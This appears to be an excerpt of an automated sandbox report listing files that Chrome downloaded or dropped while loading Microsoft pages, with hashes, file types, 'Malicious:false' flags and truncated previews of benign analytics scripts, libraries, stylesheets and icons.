                                                                                                                                                                                                          SSDEEP:48:4435HDQ258U3JqVnCG/6YyTrkzRLj9tSRAE9P:hU25ZqVC6ByTrWRLjSRAE9P
                                                                                                                                                                                                          MD5:4CFFC2C9B55F8BDE649E0D2535A1EEBD
                                                                                                                                                                                                          SHA1:2AAF4DF1E02ED4F5BB48F00A7423F748BF544E0C
                                                                                                                                                                                                          SHA-256:7BB50A050792F761855CC330E0248D037B37DD68FD23FBB7DB8A7E8694F50A94
                                                                                                                                                                                                          SHA-512:599C87219B7E264CFF8E6951192C691E26DFFA88EFC607EDFE9205F1BB08DA28FD61B508FAE93652BE36BE1ADA57E50661490925B247A43C3EB7F24D8CA0C8D0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:'use strict';var experimentationAnalytics=function(){function g(a){return a&&0<a.length?!1:!0}function m(a){return Object.keys(a).map(function(b){return b+""+a[b]}).join("")}function n(a){var b=a.reduce(function(c,e){c[m(e)]=e;return c},{});return Object.keys(b).map(function(c){return b[c]})}function h(a){console.log("sendToVortex Call");a&&a.analytics&&f(a)}function k(a){return{actionType:"A",behavior:"12",content:JSON.stringify({}),pageTags:{tnta:a&&a.analytics?a.analytics.tnta:""}}}function l(a,.b){return{actionType:"A",behavior:"12",content:JSON.stringify({}),pageTags:{tnta:"",at_activity_name:a&&a.responseTokens[b]?a.responseTokens[b]["activity.name"]:"",at_exp_name:a&&a.responseTokens[b]?a.responseTokens[b]["experience.name"]:"",at_activity_id:a&&a.responseTokens[b]?a.responseTokens[b]["activity.id"]:"",at_exp_id:a&&a.responseTokens[b]?a.responseTokens[b]["experience.id"]:""}}}function f(a,b,c){b="number"===typeof b?b:25;c="number"===typeof c?c:200;var e=0;if(window.expAnalytics&
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):786
                                                                                                                                                                                                          Entropy (8bit):5.063005301080572
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:wD7XG68tgyGRo9f+NtCOILcGbtKLYgkZrGJqN7AA7no7Nzfg:YKbfMQpZZreg8CApg
                                                                                                                                                                                                          MD5:6804C4E377A65E8D110018A28B97C035
                                                                                                                                                                                                          SHA1:07CA294F77F622A072A5B2CE1C2C14C3627A389F
                                                                                                                                                                                                          SHA-256:3B271325E90DDB188A858500B4939D6D4BBC0E28720DA2C486266704C715A8DB
                                                                                                                                                                                                          SHA-512:87AC94038D518F3A1321388131304C414A6B00789C905DFA981902B344C2C711C35B7149E2CCD37514C3FA5A90594463F01D6364FB972606E5209F2FFDDED777
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:/*.. * Globalize Culture en-US.. *.. * http://github.com/jquery/globalize.. *.. * Copyright Software Freedom Conservancy, Inc... * Dual licensed under the MIT or GPL Version 2 licenses... * http://jquery.org/license.. *.. * This file was generated by the Globalize Culture Generator.. * Translation: bugs found in this file need to be fixed in the generator.. */....(function( window, undefined ) {....var Globalize;....if ( typeof require !== "undefined" &&...typeof exports !== "undefined" &&...typeof module !== "undefined" ) {...// Assume CommonJS...Globalize = require( "globalize" );..} else {...// Global variable...Globalize = window.Globalize;..}....Globalize.addCultureInfo( "en-US", "default", {...name: "en-US",...englishName: "English (United States)"..});....}( this ));..
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (510)
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):1973
                                                                                                                                                                                                          Entropy (8bit):4.4914538760871165
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:xCgigRgQgGKgeg5Cgfgy7gBgugDgBCgRgogvg+gdg27eG8T5aW:IlmvhK5TQX7WpMV8V2HgDeG8taW
                                                                                                                                                                                                          MD5:81B1EF0C4A6B80454291234FCD6E45B0
                                                                                                                                                                                                          SHA1:1353F3119D378FFB222149AE19755423EF5347BE
                                                                                                                                                                                                          SHA-256:B05D865A37D5EFC60E028BC9FBC6B63459C78D21B0B70B3797AC97C1AD9BA88D
                                                                                                                                                                                                          SHA-512:6409931AF06BAE75E4CFC57FF2B877915404A9D805F8C9076390C4BC8FF634BA96B2ED561FCC4E57869110E62BE05AB75A1578E7935CEC9605EAA77C893643AD
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/reimagine/clientlib-reimagine-base.min.ACSHASH81b1ef0c4a6b80454291234fcd6e45b0.css
                                                                                                                                                                                                          Preview:[data-oc-token-text]{display:contents}..editorial-article--chapter .editorial-article__slot .block-heading h1,.editorial-article--chapter .editorial-article__slot .block-heading h2,.editorial-article--chapter .editorial-article__slot .block-heading h3,.editorial-article--chapter .editorial-article__slot .block-heading h4,.editorial-article--chapter .editorial-article__slot .block-heading h5,.editorial-article--chapter .editorial-article__slot .block-heading p{margin-block:var(--root-spacing-xl)}..editorial-article--chapter .editorial-article__slot .block-heading h1:first-child,.editorial-article--chapter .editorial-article__slot .block-heading h2:first-child,.editorial-article--chapter .editorial-article__slot .block-heading h3:first-child,.editorial-article--chapter .editorial-article__slot .block-heading h4:first-child,.editorial-article--chapter .editorial-article__slot .block-heading h5:first-child,.editorial-article--chapter .editorial-article__slot .block-heading p:first-child{ma
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2432
                                                                                                                                                                                                          Entropy (8bit):4.834130257531367
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:s9JaZbpyRv71XBd8jByZJ4JaWuOjZPpHy6oTUU4yKN7y+J4WPM+Nd:0AZdABXLEUZOxjZPo6S1G7es
                                                                                                                                                                                                          MD5:F25FEC6821F63D701A6B6291A4011894
                                                                                                                                                                                                          SHA1:1260AC884282372B86F3A600BA8903AD75983E67
                                                                                                                                                                                                          SHA-256:DD8619BE444CCE5F8DB053215BB018C0BBC09AF7BAA9E66618BDF041B0A2E09C
                                                                                                                                                                                                          SHA-512:1F3C21E2C32DC8362A1CA12801FEC56BD22CDAF0BB7FB8D0D118348019EB843A63A171154BB0392DFEE268C5727F47CF139144596C0DFB7D12125CE659DB35C9
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:/**. * Send telemetry data when a Click Group is clicked, if the clicked element. * is not the target/anchor/button itself.. */.(() => {. const ACTION_TYPES = {. LEFT_CLICK: 'CL'. };.. const EventName = {. CLICK: 'click'. };.. let analytics = null;.. /**. * Get dataBi attributes from an element's dataset. * @param {HTMLElement} element - The element to get dataBi attributes from. * @returns {Object} - An object containing the dataBi attributes. */. const getDataBi = (element) => {. if (!element || !element.dataset) {. return {};. }.. return Object.fromEntries(. Object.entries(element.dataset). .filter(([key]) => key.startsWith('bi') && key.charAt(2) === key.charAt(2).toUpperCase()). .map(([key, value]) => [. key.charAt(2).toLowerCase() + key.slice(3),. value. ]). );. };.. /**. * Send telemetry data to the analytics plugin. * @param {string} behaviorId - The behavior ID. * @param {string} actionTyp
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):61
                                                                                                                                                                                                          Entropy (8bit):3.990210155325004
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                                                                                                                          MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                                                                                                                          SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                                                                                                                          SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                                                                                                                          SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1
                                                                                                                                                                                                          Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):175
                                                                                                                                                                                                          Entropy (8bit):4.68043398329258
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:agWqLs3KOBmKL8ELDSzEfYZBAeOE8c/yCN9xGV9LH1CNILWAcELDlpKOBmKL8ELQ:QqtgLSH9xGf1OILWAfkgXe
                                                                                                                                                                                                          MD5:96F0C5B1219E39B8788028F5C17A5AD9
                                                                                                                                                                                                          SHA1:D6DCE0DE065B0D13905EAEDA0BA5C0DEA3D8F67C
                                                                                                                                                                                                          SHA-256:1FC2BCE2D46DF4565B8C488B22225CFE7ADB7C37CC9A542D4F85B61995B306CB
                                                                                                                                                                                                          SHA-512:057810FA0558506C6B8ABECB1A7A58FF61DA0609B3A5798BB42DE3A9B801CA0D8B20C4C1F9A250EE33D30492452CC5C4553332B16300408AA0C45B1515D4AF10
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/cascade.component.authoring/clientlibs/clientlib-cookieconsent.min.ACSHASH96f0c5b1219e39b8788028f5c17a5ad9.js
                                                                                                                                                                                                          Preview:'use strict';function AEMOnCookieConsentChangedCallback(a){}if("undefined"!=typeof WcpConsent&&null!=WcpConsent)WcpConsent.onConsentChanged(AEMOnCookieConsentChangedCallback);
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65154)
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):670684
                                                                                                                                                                                                          Entropy (8bit):5.433719344565622
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:6144:Vx/GqVXOQnci8eGRuufsr5zQ47GKXUZMUpAnfsqY3VOm1/muDVyGZht1dDgFeSXf:Vx/hVwiURum05bLmXQGPd0f
                                                                                                                                                                                                          MD5:F6C117781C99DDCDF833C21E54E69A0D
                                                                                                                                                                                                          SHA1:7529D8E1F5F3AF34083AF5818E941EDF96965496
                                                                                                                                                                                                          SHA-256:C44A878AB0193B2F2F94697B0C46878CE5103EA044421CD4668EDD12BBDBEA1B
                                                                                                                                                                                                          SHA-512:6335172C6667D7EE63CA6D41AEA24F5026E3E3D92CAFB92C39BC8FD9629D25DFDD2F3E2F771EA8CADCD958E70E2EEF6A87ED8FAE4BA5D518C0A166B6C9BA26DA
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.this.parseTimeMarkers = this.parseTimeMarkers || {};.var marker = this.parseTimeMarkers['powerbiportal.externals.bundle.min.js'] || (this.parseTimeMarkers['powerbiportal.externals.bundle.min.js'] = {});.marker.startEval = window.jsCommon && window.jsCommon.performance && window.jsCommon.performance.now ? window.jsCommon.performance.now() : Date.now(); marker.isExternal = false;.if (window.perfTracking && window.perfTracking.startBundleEval) window.perfTracking.startBundleEval('powerbiportal.externals.bundle.min.js');var marker;this.parseTimeMarkers=this.parseTimeMarkers||{},(marker=this.parseTimeMarkers["polyfills.min.js"]||(this.parseTimeMarkers["polyfills.min.js"]={})).startEval=window.jsCommon&&window.jsCommon.performance&&window.jsCommon.performance.now?window.jsCommon.performance.now():Date.now(),window.perfTracking&&window.perfTracking.startBundleEval&&window.perfTracking.startBundleEval("polyfills.min.js"),function(){"use strict";var t={7573:function(){!function(t){var e=t.perf
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):48316
                                                                                                                                                                                                          Entropy (8bit):5.6346993394709
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                                                                                                                                          MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                                                                                                                          SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                                                                                                                          SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                                                                                                                          SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                                                                                                                                                          Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (52717), with no line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):52717
                                                                                                                                                                                                          Entropy (8bit):5.462668685745912
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
                                                                                                                                                                                                          MD5:413FCC759CC19821B61B6941808B29B5
                                                                                                                                                                                                          SHA1:1AD23B8A202043539C20681B1B3E9F3BC5D55133
                                                                                                                                                                                                          SHA-256:DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
                                                                                                                                                                                                          SHA-512:E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):2432
                                                                                                                                                                                                          Entropy (8bit):4.834130257531367
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:s9JaZbpyRv71XBd8jByZJ4JaWuOjZPpHy6oTUU4yKN7y+J4WPM+Nd:0AZdABXLEUZOxjZPo6S1G7es
                                                                                                                                                                                                          MD5:F25FEC6821F63D701A6B6291A4011894
                                                                                                                                                                                                          SHA1:1260AC884282372B86F3A600BA8903AD75983E67
                                                                                                                                                                                                          SHA-256:DD8619BE444CCE5F8DB053215BB018C0BBC09AF7BAA9E66618BDF041B0A2E09C
                                                                                                                                                                                                          SHA-512:1F3C21E2C32DC8362A1CA12801FEC56BD22CDAF0BB7FB8D0D118348019EB843A63A171154BB0392DFEE268C5727F47CF139144596C0DFB7D12125CE659DB35C9
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-click-group-telemetry.min.ACSHASHf25fec6821f63d701a6b6291a4011894.js
                                                                                                                                                                                                          Preview:/**. * Send telemetry data when a Click Group is clicked, if the clicked element. * is not the target/anchor/button itself.. */.(() => {. const ACTION_TYPES = {. LEFT_CLICK: 'CL'. };.. const EventName = {. CLICK: 'click'. };.. let analytics = null;.. /**. * Get dataBi attributes from an element's dataset. * @param {HTMLElement} element - The element to get dataBi attributes from. * @returns {Object} - An object containing the dataBi attributes. */. const getDataBi = (element) => {. if (!element || !element.dataset) {. return {};. }.. return Object.fromEntries(. Object.entries(element.dataset). .filter(([key]) => key.startsWith('bi') && key.charAt(2) === key.charAt(2).toUpperCase()). .map(([key, value]) => [. key.charAt(2).toLowerCase() + key.slice(3),. value. ]). );. };.. /**. * Send telemetry data to the analytics plugin. * @param {string} behaviorId - The behavior ID. * @param {string} actionTyp
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):1739
                                                                                                                                                                                                          Entropy (8bit):4.05445408846263
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:n/Egn6TVRKHTLISujRXKBhsAq47Rt0MzVDIRwiBuAx8ZpRVXlxw8Rf+ZJE30DE:nMgn6SHTLISoKBhsA7X0MVEJhA
                                                                                                                                                                                                          MD5:2D2AAD649742385AEBE585E25E433E32
                                                                                                                                                                                                          SHA1:6510C1B80C83B1996337CB01580AC62C89623B1F
                                                                                                                                                                                                          SHA-256:A8BE8B07C5EC53009017FF86D0FBED11A706B22332F1BFB1AE5FD1B84638F94B
                                                                                                                                                                                                          SHA-512:32AFE4FF96112017F6FFF8A9CAF377CFB1248B2B9078818D065CF70D0FB82C894B850FD085164BFE2325BA54394E6B5A6DBC6FEF094FAE177C547DA958E400B7
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:"https://cdn-dynmedia-1.microsoft.com/is/content/microsoftcorp/Use-Cases1?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=32&hei=32&qlt=100&fmt=png-alpha&fit=constrain"
                                                                                                                                                                                                          Preview:<svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M6.25 12.4974C7.2165 12.4974 8 13.2809 8 14.2474V16.7474C8 17.7139 7.2165 18.4974 6.25 18.4974H3.75C2.7835 18.4974 2 17.7139 2 16.7474V14.2474C2 13.2809 2.7835 12.4974 3.75 12.4974H6.25ZM13.25 12.4974C14.2165 12.4974 15 13.2809 15 14.2474V16.7474C15 17.7139 14.2165 18.4974 13.25 18.4974H10.75C9.7835 18.4974 9 17.7139 9 16.7474V14.2474C9 13.2809 9.7835 12.4974 10.75 12.4974H13.25ZM20.25 12.4974C21.2165 12.4974 22 13.2809 22 14.2474V16.7474C22 17.7139 21.2165 18.4974 20.25 18.4974H17.75C16.7835 18.4974 16 17.7139 16 16.7474V14.2474C16 13.2809 16.7835 12.4974 17.75 12.4974H20.25ZM6.25 13.9974H3.75C3.61193 13.9974 3.5 14.1094 3.5 14.2474V16.7474C3.5 16.8855 3.61193 16.9974 3.75 16.9974H6.25C6.38807 16.9974 6.5 16.8855 6.5 16.7474V14.2474C6.5 14.1094 6.38807 13.9974 6.25 13.9974ZM13.25 13.9974H10.75C10.6119 13.9974 10.5 14.1094 10.5 14.2474V16.7474C10.5 16.8855 10.6119 16.9974 10.75 16.9
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:exported SGML document, ASCII text, with very long lines (366)
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1904
                                                                                                                                                                                                          Entropy (8bit):4.802036868832552
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:nl6d5pMwWkcphd5pMwW1qFRFvrukF0gx5eg6eZ3DrvvBuWky86q8HqouQN:lK5m4Ub5m4jvqyVx58eZvgyFqWqy
                                                                                                                                                                                                          MD5:305E80CB22D0F14E474C408C181CB792
                                                                                                                                                                                                          SHA1:8B946E3AD049A39E3BBC925B1D40BBE2F2A7E2B6
                                                                                                                                                                                                          SHA-256:A8FB92359BE5D0FB839DED898756E674A74C9A52DA8340431C2CF24B05AA43C5
                                                                                                                                                                                                          SHA-512:4F398BC8323454C5213EF37A5425A7FB114CE251A8C63C5112001DE1879EA23BBBD8A0C96DA78B7F189C659D63AFE273D90833DB464AEDBA98F6F32EF98BE8D9
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:'use strict';function getSkuMarkup(a,c){let b=a.discountedTextTemplate;a.isDiscounted&&b&&(b=b.replace(window.ocReimagine.ProductPriceModule.ProductPricingConstants.Parameters.ScreenReader.ListPriceKey,c.sku.displayListPrice),b=b.replace(window.ocReimagine.ProductPriceModule.ProductPricingConstants.Parameters.ScreenReader.MsrpKey,c.sku.displayMSRPPrice));const d=`. <div . class="sku__pricing-discount">. <span class="oc-displayMSRPPrice">${c.sku.displayMSRPPrice}</span>. </div>. `,e=`. <div class="sku__detail-recurrence">. <span class="oc-displayUnit">${a.displayUnitMap[c.productId]}. </span>. </div>. `;return`. <div class="sku__title" data-ocr-pricing-render="title">. <h3 class="oc-product-title">${a.renderTitle}</h3>. </div>. <div class="sku__paragraph" data-ocr-pricing-content="paragraph"></div>. ${a.isDiscounted?`. <p class="sr-only" data-ocr-pricing-render="sc
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2714
                                                                                                                                                                                                          Entropy (8bit):3.88910583811547
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:n/oHbBhnCBISZouithR7n/JJZ8ZrjRK8SDOQERYRjgHl7o74E7IacnEo3Xg6UIh:ngHLQ4ughRDJApjR3v9IjgW7Rcg6Uc
                                                                                                                                                                                                          MD5:6DAED1E6E97ABE3DE61F9C2316C3EC4A
                                                                                                                                                                                                          SHA1:5D7369742BC9211CD82DEF74ECE49AAE6E09F384
                                                                                                                                                                                                          SHA-256:C8FAD58FB046C7BF1C02E506300FD49B34156CCDD3123C755E9BC61C259DDD14
                                                                                                                                                                                                          SHA-512:A3149E4E36F2998F30C7458F42DF741FA4F82DA3E28174D836A52C75565BE29AE2ECD6F508853D2D0C015A6DC1B141C652A19A13B5CB031548024580FEB30776
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M15.2963 15.8965C16.4558 15.8965 17.3958 16.8365 17.3958 17.996L17.3945 19.1502C17.5345 21.7765 15.5818 23.1057 12.0772 23.1057C8.58737 23.1057 6.59841 21.7982 6.59841 19.1957V17.996C6.59841 16.8365 7.53839 15.8965 8.69791 15.8965H15.2963ZM15.2963 17.6961H8.69791C8.53226 17.6961 8.39798 17.8304 8.39798 17.996V19.1957C8.39798 20.6068 9.46173 21.3061 12.0772 21.3061C14.6781 21.3061 15.6713 20.6301 15.5963 19.1981V17.996C15.5963 17.8304 15.462 17.6961 15.2963 17.6961ZM2.0995 9.89798L7.34943 9.89808C7.25075 10.2815 7.19827 10.6835 7.19827 11.0977C7.19827 11.3006 7.21086 11.5005 7.23531 11.6968L2.0995 11.6975C1.93385 11.6975 1.79957 11.8318 1.79957 11.9975V13.1972C1.79957 14.6083 2.86331 15.3075 5.47883 15.3075C6.03298 15.3075 6.51415 15.2768 6.92755 15.2147C6.24951 15.6442 5.74117 16.3152 5.52014 17.1061L5.47883 17.1071C1.98896 17.1071 0 15.7996 0 13.1972V11.9975C0 10.838 0.939976 9.897
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1748
                                                                                                                                                                                                          Entropy (8bit):3.996779045636375
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:tPnRGKuJfEk5V8vIUSBPVMHlni0YWdjoz2koyHuNTMbuia8w6EvH5MmArh7SUimg:hRGM1QPVoi0Pzh4Ef5P2biCee02l0jz
                                                                                                                                                                                                          MD5:DC1E0183B38AC7A568B97DF4FBAE12E5
                                                                                                                                                                                                          SHA1:710E6D103C5EBD066A299F7E09E8F6E152F20351
                                                                                                                                                                                                          SHA-256:E7D5E26B96D1C3FF0A8829E603A299637FE62D1F280547E7DBB8126CB9FEF323
                                                                                                                                                                                                          SHA-512:1ADC9D87631B8454CAA9C5557E7CD4D5C51B8C7F335FBA88AC32BBDECD5A09518B53D77AB79A4B6BAFED0F31362FAB28BF2444AFC37EDE6DE4BCCFCCBFC4FEC4
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<svg width="25" height="25" viewBox="0 0 25 25" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M4.65065 0.5H12.684C15.068 0.5 17.0007 2.43264 17.0007 4.81667V5C17.0007 5.46024 16.6276 5.83333 16.1673 5.83333C15.7071 5.83333 15.334 5.46024 15.334 5V4.81667C15.334 3.35311 14.1475 2.16667 12.684 2.16667H4.65065C3.1871 2.16667 2.00065 3.35311 2.00065 4.81667V12.85C2.00065 14.3136 3.1871 15.5 4.65065 15.5H12.3944C12.7079 13.7933 14.2033 12.5 16.0007 12.5C18.0257 12.5 19.6673 14.1416 19.6673 16.1667C19.6673 18.1917 18.0257 19.8333 16.0007 19.8333C14.3223 19.8333 12.9073 18.7057 12.472 17.1667H4.65065C2.26662 17.1667 0.333984 15.234 0.333984 12.85V4.81667C0.333984 2.43264 2.26662 0.5 4.65065 0.5ZM14.0007 16.1667C14.0007 17.2712 14.8961 18.1667 16.0007 18.1667C17.1052 18.1667 18.0007 17.2712 18.0007 16.1667C18.0007 15.0621 17.1052 14.1667 16.0007 14.1667C14.8961 14.1667 14.0007 15.0621 14.0007 16.1667ZM7.66732 20.3333V20C7.66732 19.5398 8.04041 19.1667 8.50065 19.1667C8.96089 19.1667
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (52717), with no line terminators
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):52717
                                                                                                                                                                                                          Entropy (8bit):5.462668685745912
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
                                                                                                                                                                                                          MD5:413FCC759CC19821B61B6941808B29B5
                                                                                                                                                                                                          SHA1:1AD23B8A202043539C20681B1B3E9F3BC5D55133
                                                                                                                                                                                                          SHA-256:DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
                                                                                                                                                                                                          SHA-512:E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://wcpstatic.microsoft.com/mscc/lib/v2/wcp-consent.js
